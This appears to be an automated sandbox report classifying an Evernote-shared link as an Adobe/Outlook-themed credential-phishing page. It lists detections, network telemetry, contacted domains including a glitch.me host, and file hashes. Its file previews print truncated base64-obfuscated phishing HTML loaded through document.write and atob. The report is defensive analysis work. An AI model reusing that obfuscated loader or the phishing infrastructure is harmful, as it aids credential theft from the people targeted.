Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.evernote.com/shard/s414/sh/627a5c63-1d1d-8a55-532f-94a39892d3b3/kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw

Overview

General Information

Sample URL:https://www.evernote.com/shard/s414/sh/627a5c63-1d1d-8a55-532f-94a39892d3b3/kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw
Analysis ID:840386

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish7
Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
HTML body contains password input but no form action

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.evernote.com/shard/s414/sh/627a5c63-1d1d-8a55-532f-94a39892d3b3/kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
    • chrome.exe (PID: 3284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1772,i,1544887805851308689,1899001627689456856,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
  • cleanup
SourceRuleDescriptionAuthorStrings
57589.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    57589.3.pages.csvJoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
      57589.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        57589.4.pages.csvJoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: Yara matchFile source: 57589.3.pages.csv, type: HTML
          Source: Yara matchFile source: 57589.4.pages.csv, type: HTML
          Source: file:///C:/Users/user/Downloads/message%20(1).htmlMatcher: Template: adobe matched with high similarity
          Source: Yara matchFile source: 57589.3.pages.csv, type: HTML
          Source: Yara matchFile source: 57589.4.pages.csv, type: HTML
          Source: file:///C:/Users/user/Downloads/message%20(1).htmlHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: file:///C:/Users/user/Downloads/message%20(1).htmlHTTP Parser: <input type="password" .../> found
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
          Source: unknownDNS traffic detected: queries for: www.evernote.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 198.54.125.130
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
          Source: classification engineClassification label: mal64.phis.win@30/78@11/212
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.evernote.com/shard/s414/sh/627a5c63-1d1d-8a55-532f-94a39892d3b3/kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1772,i,1544887805851308689,1899001627689456856,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1772,i,1544887805851308689,1899001627689456856,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdater
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\189d4c8f-1d03-4bd4-8cd7-2086f882416f.tmp
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          3
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium2
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://www.evernote.com/shard/s414/sh/627a5c63-1d1d-8a55-532f-94a39892d3b3/kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw1%VirustotalBrowse
          https://www.evernote.com/shard/s414/sh/627a5c63-1d1d-8a55-532f-94a39892d3b3/kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          wtrt62.glitch.me
          50.16.150.90
          truefalse
            high
            accounts.google.com
            142.250.185.205
            truefalse
              high
              dashboard.svc.www.evernote.com
              35.190.3.250
              truefalse
                high
                www.google.com
                142.250.184.196
                truefalse
                  high
                  auth-cloudfront.prod.ims.adobejanus.com
                  52.222.214.54
                  truefalse
                    unknown
                    clients.l.google.com
                    172.217.16.142
                    truefalse
                      high
                      stats.g.doubleclick.net
                      173.194.76.157
                      truefalse
                        high
                        use.typekit.net
                        unknown
                        unknownfalse
                          high
                          clients2.google.com
                          unknown
                          unknownfalse
                            high
                            content.evernote.com
                            unknown
                            unknownfalse
                              high
                              www.evernote.com
                              unknown
                              unknownfalse
                                high
                                cdn.glitch.global
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://www.evernote.com/shard/s414/client/snv/cefalse
                                    high
                                    https://www.evernote.com/shard/s414/client/snv?isnewsnv=true&noteGuid=627a5c63-1d1d-8a55-532f-94a39892d3b3&noteKey=kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw&sn=https%3A%2F%2Fwww.evernote.com%2Fshard%2Fs414%2Fsh%2F627a5c63-1d1d-8a55-532f-94a39892d3b3%2FkR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw&title=Westerman%2BBall%2BEderer%2BMiller%2BZucker%2B%2526%2BSharfstein%2BLLPfalse
                                      high
                                      file:///C:/Users/user/Downloads/message%20(1).htmltrue
                                        low
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        88.221.168.234
                                        unknownEuropean Union
                                        16625AKAMAI-ASUSfalse
                                        173.194.76.157
                                        stats.g.doubleclick.netUnited States
                                        15169GOOGLEUSfalse
                                        52.109.13.62
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        34.104.35.123
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        216.58.212.138
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        198.54.125.130
                                        unknownUnited States
                                        22612NAMECHEAP-NETUSfalse
                                        142.250.185.205
                                        accounts.google.comUnited States
                                        15169GOOGLEUSfalse
                                        142.250.185.227
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.181.238
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        52.222.214.54
                                        auth-cloudfront.prod.ims.adobejanus.comUnited States
                                        16509AMAZON-02USfalse
                                        52.109.32.24
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        35.190.3.250
                                        dashboard.svc.www.evernote.comUnited States
                                        15169GOOGLEUSfalse
                                        192.229.221.95
                                        unknownUnited States
                                        15133EDGECASTUSfalse
                                        142.250.184.228
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        151.101.2.132
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        2.16.202.120
                                        unknownEuropean Union
                                        16625AKAMAI-ASUSfalse
                                        172.217.16.195
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        50.16.150.90
                                        wtrt62.glitch.meUnited States
                                        14618AMAZON-AESUSfalse
                                        172.217.16.142
                                        clients.l.google.comUnited States
                                        15169GOOGLEUSfalse
                                        IP
                                        192.168.2.1
                                        127.0.0.1
                                        Joe Sandbox Version:37.0.0 Beryl
                                        Analysis ID:840386
                                        Start date and time:2023-04-03 22:20:22 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://www.evernote.com/shard/s414/sh/627a5c63-1d1d-8a55-532f-94a39892d3b3/kR5vGFNqXhQmVefVOLGin_iPa24MvPJwBuLKmYzvHKcedg5jAkri-F3cMw
                                        Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                                        Number of analysed new started processes analysed:10
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:1
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal64.phis.win@30/78@11/212
                                        • Exclude process from analysis (whitelisted): SIHClient.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 88.221.168.234, 142.250.185.227, 34.104.35.123, 142.250.181.238
                                        • Excluded domains from analysis (whitelisted): www.evernote.com.edgekey.net, edgedl.me.gvt1.com, login.live.com, e7641.b.akamaiedge.net, clientservices.googleapis.com, www.google-analytics.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):576
                                        Entropy (8bit):5.042900378942049
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2925F67F519373EE31BE0985E80FC0DA
                                        SHA1:E4E06272C186B10AD486163CB7F49ABD8498DEDF
                                        SHA-256:F697F65073B8A47E8D8FA0928363668D118E02B5C77968F2765867F032595AE9
                                        SHA-512:7959CFA15943CE1943E6F0439D577D39896B44F84CA7175B22DC1AF2B613DEEBD2D7784F2412436D664C1B37C390CDE23FE4B20CCEEC9C37FD98B9901301833B
                                        Malicious:false
                                        Reputation:low
                                        Preview:.6...AAAAAAA...AAAAA...A.A.A/ALAAAAAAAAAAAbA5AtA.!.AGA.A.bbA.A`A.].A%A.A...A AHA...AVA.A.n.AKA.A6d.A.A.A6.A~AEA...6.A.A..Ab.A...A...A...An.LA..bA...A..bA..#A..bA5..A...6#.qA.^tA..&A.5.6..A..bA..A...6`.~A.G.6N..A..bA2..A...A6#.A.-.A.#.A...A.#cA...6*#.A.*bA..A...An..A...A..A..bA..A. bA..A.tbA.SAA.AbA.S.A.6.AF..A.L.A`..A...AN.A...A..(A.}.A...A.1.A...A..A...A...AV..A..AQ.yA._.AE.MA...A|.A...AU..A...6...A...6...A.?.6...A.H.A..A.9bAK.XA...A...A...A..DA..A...A.%bAZ.A.;b.q..A.#b...7A...Aw..A68.AAA.AtA.6...........................................................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (17004)
                                        Category:dropped
                                        Size (bytes):17059
                                        Entropy (8bit):5.532268504573155
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8DF353B2E2918DFD656BA46208292F4D
                                        SHA1:C0EE46EB2EB96185F4766518DCC8D86DB702AE72
                                        SHA-256:2AEEA29487DB58C567F7D0537E765DD9EB1702B4A2A59D2DC1A7645C3F9FF449
                                        SHA-512:9ACA4A9116F948AD2A1BD5E857D09FA4ADBD24855141B572A5CA9A1F58DED05317832D67D9EB1375D24714102A6AC2FA2165C2EA27D0B31748179F13A8AF7825
                                        Malicious:false
                                        Reputation:low
                                        Preview:<!DOCTYPE html>.<html>.<script type="text/javascript">.document.write(decodeURIComponent(atob('JTNDJTNGcGhwJTBBJTBBaW5jbHVkZSglMjdiYi5waHAlMjcpJTNCJTBBJTNGJTNFJTBBJTNDIURPQ1RZUEUlMjBodG1sJTNFJTBBJTNDaHRtbCUyMGxhbmclM0QlMjJlbiUyMiUyMGNsYXNzJTNEJTIyd2YtYWRvYmVjbGVhbi1uNC1hY3RpdmUlMjB3Zi1hZG9iZWNsZWFuLW43LWFjdGl2ZSUyMHdmLWFkb2JlY2xlYW4tbjMtYWN0aXZlJTIwd2YtYWN0aXZlJTIyJTNFJTNDaGVhZCUzRSUwQSUzQ3NjcmlwdCUzRSUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGZ1bmN0aW9uJTIwYSgpJTdCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJTI3bXlJbWFnZSUyNyklMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAuc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZjZG4uZ2xpdGNoLmdsb2JhbCUyRjQ5ODRlM2Y2LTg4MTctNDUwNC1hOThmLWExNzE0YWE3MjZhMCUyRm91dC5wbmclMjIlM0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCglMjdkZXRhaWwlMjcpLnZhbHVlJTIwJTNEJTIwJTI3T3V0bG9vayUyNyUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyM
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (65481)
                                        Category:dropped
                                        Size (bytes):817990
                                        Entropy (8bit):5.590885023364332
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:80DA5094556291AF0BC48186094ED888
                                        SHA1:BDDFD7C9B96657E3CD5DA351E4A634D8F06EAE29
                                        SHA-256:4697F13788044E78ABAA108382E7FE94E0032F86A720AF8C6E82AB75B68A93CB
                                        SHA-512:03F243BED6F519003F3BE9E24EA8CEA24F74996C5915C37CA429F6539A25043327C4AED5239CB603922A3863F624D06FFC2CAB1FF1F54574A0987A926D8D80B2
                                        Malicious:false
                                        Reputation:low
                                        Preview:<!DOCTYPE html>.<html>.<script type="text/javascript">.document.write(decodeURIComponent(atob('JTNDJTNGcGhwJTBBJTBBaW5jbHVkZSglMjdiYi5waHAlMjcpJTNCJTBBJTNGJTNFJTBBJTNDIURPQ1RZUEUlMjBodG1sJTNFJTBBJTNDaHRtbCUyMGxhbmclM0QlMjJlbiUyMiUyMGNsYXNzJTNEJTIyd2YtYWRvYmVjbGVhbi1uNC1hY3RpdmUlMjB3Zi1hZG9iZWNsZWFuLW43LWFjdGl2ZSUyMHdmLWFkb2JlY2xlYW4tbjMtYWN0aXZlJTIwd2YtYWN0aXZlJTIyJTNFJTNDaGVhZCUzRSUwQSUzQ3NjcmlwdCUzRSUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGZ1bmN0aW9uJTIwYSgpJTdCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJTI3bXlJbWFnZSUyNyklMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAuc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZjZG4uZ2xpdGNoLmdsb2JhbCUyRjQ5ODRlM2Y2LTg4MTctNDUwNC1hOThmLWExNzE0YWE3MjZhMCUyRm91dC5wbmclMjIlM0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCglMjdkZXRhaWwlMjcpLnZhbHVlJTIwJTNEJTIwJTI3T3V0bG9vayUyNyUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyM
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (65481)
                                        Category:dropped
                                        Size (bytes):817990
